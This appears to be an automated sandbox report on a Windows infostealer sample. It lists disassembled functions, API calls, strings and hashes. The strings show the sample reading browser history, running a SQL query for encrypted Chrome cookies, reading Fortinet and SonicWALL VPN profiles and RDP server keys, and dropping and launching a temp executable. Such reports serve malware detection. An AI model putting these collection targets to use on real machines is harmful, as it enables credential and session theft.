String ID: =r:r$>r!r$>r!r
API String ID: 199669925-1865137870
Opcode ID: dd8ddd59f5a9d1b493c0ee37e8ab2d9d1496534815be34523f1cccd61e165c5d
Instruction ID: 010b60d0c7c587cc2814605292064eed9324d2409c30eaa04a11ada122e50864
Opcode Fuzzy Hash: dd8ddd59f5a9d1b493c0ee37e8ab2d9d1496534815be34523f1cccd61e165c5d
Instruction Fuzzy Hash: BFA1E576B08781C6EB94EF6694409ADB7A1FB89B84F98403AEE4D57B48CF3CD405CB10

Function 00007FF763AF78EC Relevance: 6.1, APIs: 4, Instructions: 56libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF763AF797A
GetProcAddress.KERNEL32 ref: 00007FF763AF7986
GetCurrentProcess.KERNEL32 ref: 00007FF763AF7995
IsWow64Process.KERNEL32 ref: 00007FF763AF79A3

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Process$AddressCurrentLibraryLoadProcWow64
String ID:
API String ID: 4035193891-0
Opcode ID: cdaa70f4b17d9021ac9a311444477d27912caa0ffaeae6d3bd1739126b036b9d
Instruction ID: e9090f2eb1d7ff4b4b22cdeebb101f85c4b27c84d4426499a9213ed6be834247
Opcode Fuzzy Hash: cdaa70f4b17d9021ac9a311444477d27912caa0ffaeae6d3bd1739126b036b9d
Instruction Fuzzy Hash: F821C266E187C1C3EA916F21A44467AE790FB4D7C4F884239EACD16B46DF2CC104CB10

Function 00007FF763AF36F0 Relevance: 3.1, APIs: 2, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptExportKey.ADVAPI32 ref: 00007FF763AF3744
CryptExportKey.ADVAPI32 ref: 00007FF763AF379E

Part of subcall function 00007FF763AF25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1985,?,?,?,00007FF763AF155F), ref: 00007FF763AF25E5

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: CryptExport$HeapProcess
String ID:
API String ID: 532797600-0
Opcode ID: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
Instruction ID: 43e5eb5e5d4d26f74f7103997cb87f70485fbb352ccf2b15854488ab1fe676de
Opcode Fuzzy Hash: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
Instruction Fuzzy Hash: 6C21B236A19A42D2EB90EF11F550B79B3A0EB85B98F888235EA8D57794DF3CD401DB10

Function 00007FF763AFA534 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36bd63f4d4cfc2a336acc11997e3e8be8163387507807229baef538af77ab198
Instruction ID: 7e37f21412b300875440bedbd3a741938f53d36bec7cf6e24ec9c00a3213306f
Opcode Fuzzy Hash: 36bd63f4d4cfc2a336acc11997e3e8be8163387507807229baef538af77ab198
Instruction Fuzzy Hash: 29618B53A082D58AF741AE3844516FD6FA2EB16788F8C0039FE8D63B87D92CD007E720

Function 00007FF763AFA78C Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d01c7f7f70e755251e5213423192505223118269c658bfc9e31a8515983880f
Instruction ID: 8c7abb24ddba906f7704c5328b35c5512e0a2c3455b1bf1c98051a83104d20d6
Opcode Fuzzy Hash: 6d01c7f7f70e755251e5213423192505223118269c658bfc9e31a8515983880f
Instruction Fuzzy Hash: 3C517A47A043C18CEB129E3984927EC6F52EB25788F89403AEF9967B47D53CD107D720

Function 00007FF763AF1CBC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65filetimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32 ref: 00007FF763AF1CF7
GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF763AF1D04
wsprintfA.USER32 ref: 00007FF763AF1D1C
CreateFileA.KERNEL32 ref: 00007FF763AF1D56
WriteFile.KERNEL32 ref: 00007FF763AF1D88
CloseHandle.KERNEL32 ref: 00007FF763AF1DA9
ShellExecuteA.SHELL32 ref: 00007FF763AF1DCE

Strings

open, xrefs: 00007FF763AF1DC2
%08X.exe, xrefs: 00007FF763AF1D11

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
String ID: %08X.exe$open
API String ID: 2307396689-1771423410
Opcode ID: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
Instruction ID: e58ed21c203f67d40d76a914b433e9313a97ad60cadbbd97039f31a15fdf24ab
Opcode Fuzzy Hash: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
Instruction Fuzzy Hash: BE319576608A81D6E764DF20E884BE9A331FB8878DF844135EA4D5AA58CF3CC24DC710

Function 00007FF763AF1EEC Relevance: 12.2, APIs: 8, Instructions: 152commemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF763AF1DE8: RegCreateKeyExA.ADVAPI32 ref: 00007FF763AF1E35

CoInitializeEx.OLE32 ref: 00007FF763AF1F1E
VariantInit.OLEAUT32 ref: 00007FF763AF1F28
CoCreateInstance.OLE32 ref: 00007FF763AF1F50
SysAllocString.OLEAUT32 ref: 00007FF763AF1F61
SafeArrayCreateVector.OLEAUT32 ref: 00007FF763AF1F7D
SafeArrayAccessData.OLEAUT32 ref: 00007FF763AF1F93
SafeArrayUnaccessData.OLEAUT32 ref: 00007FF763AF1FAC
SysFreeString.OLEAUT32 ref: 00007FF763AF2111

Part of subcall function 00007FF763AF1CBC: GetTempPathA.KERNEL32 ref: 00007FF763AF1CF7
Part of subcall function 00007FF763AF1CBC: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF763AF1D04
Part of subcall function 00007FF763AF1CBC: wsprintfA.USER32 ref: 00007FF763AF1D1C
Part of subcall function 00007FF763AF1CBC: CreateFileA.KERNEL32 ref: 00007FF763AF1D56
Part of subcall function 00007FF763AF1CBC: WriteFile.KERNEL32 ref: 00007FF763AF1D88
Part of subcall function 00007FF763AF1CBC: CloseHandle.KERNEL32 ref: 00007FF763AF1DA9
Part of subcall function 00007FF763AF1CBC: ShellExecuteA.SHELL32 ref: 00007FF763AF1DCE

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
String ID:
API String ID: 1750269033-0
Opcode ID: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
Instruction ID: 70a94f4a885eacc3d71f377be7b48803eb0bed55353d6ca216b4c31cac9ac1c3
Opcode Fuzzy Hash: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
Instruction Fuzzy Hash: 83616D36B04A46D6EB44EF65D454BAC63B0FB48B88F888136DE0D6BB58DF39D509D320

Function 00007FF763AFECD0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF763AF25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1985,?,?,?,00007FF763AF155F), ref: 00007FF763AF25E5

__memcpy.DELAYIMP ref: 00007FF763AFED57

Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00159
Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00167

Part of subcall function 00007FF763AFEBA8: lstrlenA.KERNEL32 ref: 00007FF763AFEBC5

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

Strings

table, xrefs: 00007FF763AFED02
last_visit_time, xrefs: 00007FF763AFEDB3
url, xrefs: 00007FF763AFEDA0
urls, xrefs: 00007FF763AFED20

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_time$table$url$urls
API String ID: 2336645791-3896411411
Opcode ID: 357bbd6d5dbf52a54e225c9b0824b1a8228270d85fc39889bc92869a6edfa572
Instruction ID: c178eec85a530c1958435745eb227fcce1074ecc9bf4be322480efc65fc82044
Opcode Fuzzy Hash: 357bbd6d5dbf52a54e225c9b0824b1a8228270d85fc39889bc92869a6edfa572
Instruction Fuzzy Hash: 12316662A08782D1EAA0EF26F840DB9A350FB84BC4F845037EE8D57795EE3CE545D710

Function 00007FF763AFEEF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF763AF25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1985,?,?,?,00007FF763AF155F), ref: 00007FF763AF25E5

__memcpy.DELAYIMP ref: 00007FF763AFEF77

Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00159
Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00167

Part of subcall function 00007FF763AFEBA8: lstrlenA.KERNEL32 ref: 00007FF763AFEBC5

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

Strings

table, xrefs: 00007FF763AFEF22
last_visit_date, xrefs: 00007FF763AFEFD3
moz_places, xrefs: 00007FF763AFEF40
url, xrefs: 00007FF763AFEFC0

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_date$moz_places$table$url
API String ID: 2336645791-66087218
Opcode ID: 4233694b9c8e2b5a04e5395ae437dadce168e51b21df55109dc3daabe91f76a2
Instruction ID: acfbefa45715c574d7fe8a46eb1f0647970793aff9410dc011cabdcefd395f95
Opcode Fuzzy Hash: 4233694b9c8e2b5a04e5395ae437dadce168e51b21df55109dc3daabe91f76a2
Instruction Fuzzy Hash: 46318A52608743D2EAB0EB26E8409B9A390FB84BC0F88803BEE8D57795EF7CD545D710

Function 00007FF763AFF11C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF763AF25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1985,?,?,?,00007FF763AF155F), ref: 00007FF763AF25E5

__memcpy.DELAYIMP ref: 00007FF763AFF1A3

Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00159
Part of subcall function 00007FF763B00128: __memcpy.DELAYIMP ref: 00007FF763B00167

Part of subcall function 00007FF763AFEBA8: lstrlenA.KERNEL32 ref: 00007FF763AFEBC5

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

Strings

table, xrefs: 00007FF763AFF14E
last_visit_time, xrefs: 00007FF763AFF1FF
url, xrefs: 00007FF763AFF1EC
urls, xrefs: 00007FF763AFF16C

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Heap__memcpy$Process$Freelstrlen
String ID: last_visit_time$table$url$urls
API String ID: 2336645791-3896411411
Opcode ID: a171a44af3a4df966d00269ea52e92be7625e96530e226e40d767a69d8147b6d
Instruction ID: a8f34c6e6f484bc13de35af25a8ae26c8843ccde25440a551aecaf4d0b659cd7
Opcode Fuzzy Hash: a171a44af3a4df966d00269ea52e92be7625e96530e226e40d767a69d8147b6d
Instruction Fuzzy Hash: 2E31A666608782C1EEA4EB26E4409F9A790FB84BC0F84813BEE8D67795EE3CD445D710

Function 00007FF763AFE3C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF763AFE3F0
PathAppendW.SHLWAPI ref: 00007FF763AFE3FE

Strings

"},, xrefs: 00007FF763AFE4B3
":", xrefs: 00007FF763AFE495
Software\Fortinet\FortiClient\Sslvpn\Tunnels, xrefs: 00007FF763AFE3E4

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: AppendPathlstrcpy
String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
API String ID: 3043196718-4231764533
Opcode ID: 4209a7626a406522bcd4556fbae64232996b1dbfe7f6830d41379ce7dac43f30
Instruction ID: 7a47b6c75842f14c5de151cf3d6b5df0b6162ae964a954845282a5daf6011c6b
Opcode Fuzzy Hash: 4209a7626a406522bcd4556fbae64232996b1dbfe7f6830d41379ce7dac43f30
Instruction Fuzzy Hash: 3331D475A04A81C1DA60EF22D8409F9A361FB88BC0F984136FE5D2B749DF3CD544C710

Function 00007FF763AF1DE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF763AF1E35
RegSetValueExA.ADVAPI32 ref: 00007FF763AF1EBE
RegCloseKey.ADVAPI32 ref: 00007FF763AF1ED1

Strings

?, xrefs: 00007FF763AF1E29

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: CloseCreateValue
String ID: ?
API String ID: 1818849710-1684325040
Opcode ID: 3f4fa53e5a041a1e0e060734a6e5b713b9a361546c9d3b1e30c4574215ea1982
Instruction ID: 1709045ecb617e1c84f802440414984b0da3cf9233c5d26703b9729363e058d5
Opcode Fuzzy Hash: 3f4fa53e5a041a1e0e060734a6e5b713b9a361546c9d3b1e30c4574215ea1982
Instruction Fuzzy Hash: 2E21A476A14780CAE7609F71A8405EDBBA4FB4D79CB944226EACC57B59DB3CC144CB10

Function 00007FF763AFE618 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF763AFE637
PathAppendW.SHLWAPI ref: 00007FF763AFE645

Part of subcall function 00007FF763AFCD0C: RegGetValueW.KERNELBASE ref: 00007FF763AFCD4B
Part of subcall function 00007FF763AFCD0C: RegGetValueW.ADVAPI32 ref: 00007FF763AFCD8A

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

Strings

"},, xrefs: 00007FF763AFE6C3
Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles, xrefs: 00007FF763AFE62B

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: HeapValue$AppendFreePathProcesslstrcpy
String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
API String ID: 784796242-1893226844
Opcode ID: c16fdb4d624e558078139f6db0a2be6db5bd52292e2e96c0ecb44f9c092f2e46
Instruction ID: c84d34536f596bb0d87516f4c993c17516c589c7552245006e7bce4e614cd179
Opcode Fuzzy Hash: c16fdb4d624e558078139f6db0a2be6db5bd52292e2e96c0ecb44f9c092f2e46
Instruction Fuzzy Hash: 31119351A08582D0DDA0FB11E8957FAE321EF847C0FC85136F99E5B79ADE2CD104C750

Function 00007FF763AFE4E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 00007FF763AFE514
PathAppendW.SHLWAPI ref: 00007FF763AFE522

Part of subcall function 00007FF763AFCD0C: RegGetValueW.KERNELBASE ref: 00007FF763AFCD4B
Part of subcall function 00007FF763AFCD0C: RegGetValueW.ADVAPI32 ref: 00007FF763AFCD8A

Strings

Software\Microsoft\Terminal Server Client\Servers, xrefs: 00007FF763AFE508

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Value$AppendPathlstrcpy
String ID: Software\Microsoft\Terminal Server Client\Servers
API String ID: 19203174-1233151749
Opcode ID: 987b66f9db0bf2f6b47be05366b15036cb541ecc7426d31690f181000543a1b8
Instruction ID: 94d001d4cfe4b5a43efdb35f8e69759e708326235071ce113857379e292d7e88
Opcode Fuzzy Hash: 987b66f9db0bf2f6b47be05366b15036cb541ecc7426d31690f181000543a1b8
Instruction Fuzzy Hash: 7521B161614682C4DAA0BF62D854AFDA350FF88BC4F880136FA4E5B79ADE3CD204C750

Function 00007FF763AFFDF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF763AFFE25
lstrcatW.KERNEL32 ref: 00007FF763AFFE32

Part of subcall function 00007FF763AFFF50: lstrlenW.KERNEL32 ref: 00007FF763AFFF76
Part of subcall function 00007FF763AFFF50: lstrlenW.KERNEL32 ref: 00007FF763AFFF92
Part of subcall function 00007FF763AFFF50: WideCharToMultiByte.KERNEL32 ref: 00007FF763AFFFBB
Part of subcall function 00007FF763AFFF50: PathFileExistsA.SHLWAPI ref: 00007FF763AFFFC4
Part of subcall function 00007FF763AFFF50: OpenFile.KERNEL32 ref: 00007FF763AFFFDD
Part of subcall function 00007FF763AFFF50: GetFileSize.KERNEL32 ref: 00007FF763AFFFFD
Part of subcall function 00007FF763AFFF50: CreateFileMappingA.KERNEL32 ref: 00007FF763B00034
Part of subcall function 00007FF763AFFF50: MapViewOfFile.KERNEL32 ref: 00007FF763B00055
Part of subcall function 00007FF763AFFF50: __memcpy.DELAYIMP ref: 00007FF763B00067
Part of subcall function 00007FF763AFFF50: UnmapViewOfFile.KERNEL32 ref: 00007FF763B00072
Part of subcall function 00007FF763AFFF50: CloseHandle.KERNEL32 ref: 00007FF763B0007B
Part of subcall function 00007FF763AFFF50: CloseHandle.KERNEL32 ref: 00007FF763B00084

Part of subcall function 00007FF763AFF294: __memcpy.DELAYIMP ref: 00007FF763AFF2B2

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

Strings

APPDATA, xrefs: 00007FF763AFFE1E

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
String ID: APPDATA
API String ID: 2395011915-4054820676
Opcode ID: dec221e76dea18377a8f89e866c3efc32397943ca6a6be3b2fbcbd2e501cfc2f
Instruction ID: ba8a5518a7e080e8080697624f9c1b582a61a2fb9e01a9b6d4fb666ba88e18df
Opcode Fuzzy Hash: dec221e76dea18377a8f89e866c3efc32397943ca6a6be3b2fbcbd2e501cfc2f
Instruction Fuzzy Hash: A7114F22728A42D1EB90EB10E4409EDB3A1FB88784FC8403AFA8D57B59EF3CD508C750

Analysis Process: explorer.exePID: 6916, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	50.5%
Signature Coverage:	3.2%
Total number of Nodes:	786
Total number of Limit Nodes:	83

Executed Functions

Function 00803717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401
stringfileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00801B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
Part of subcall function 00801B6A: CloseHandle.KERNELBASE(00000000), ref: 00801B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 00803778
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00803782
DeleteFileW.KERNELBASE(00000000), ref: 00803789
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00803794
RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0080383B
RtlZeroMemory.NTDLL(?,00000040), ref: 00803870
lstrlen.KERNEL32(?,?,?,?,?), ref: 0080398B
lstrlen.KERNEL32(00000000), ref: 0080399A
wsprintfA.USER32 ref: 008039F1
lstrlen.KERNEL32(00000000,?,?), ref: 008039FD
lstrcat.KERNEL32(00000000,?), ref: 00803A21
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00803A49
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00803B13
lstrlen.KERNEL32(00000000), ref: 00803B22
wsprintfA.USER32 ref: 00803B79
lstrlen.KERNEL32(00000000), ref: 00803B85
lstrcat.KERNEL32(00000000,?), ref: 00803BA9
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00803BDA
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00803C16

Strings

FALSE, xrefs: 008039BC, 00803B3C
v1, xrefs: 00803821
SELECT host_key,path,is_secure,name,encrypted_value FROM cookies, xrefs: 008037C3
COOKIES, xrefs: 00803BE8, 00803BED, 00803BF6
%sTRUE%s%s%s%s%s, xrefs: 008039EB, 00803B73
TRUE, xrefs: 008039C9, 00803B51
0, xrefs: 00803828

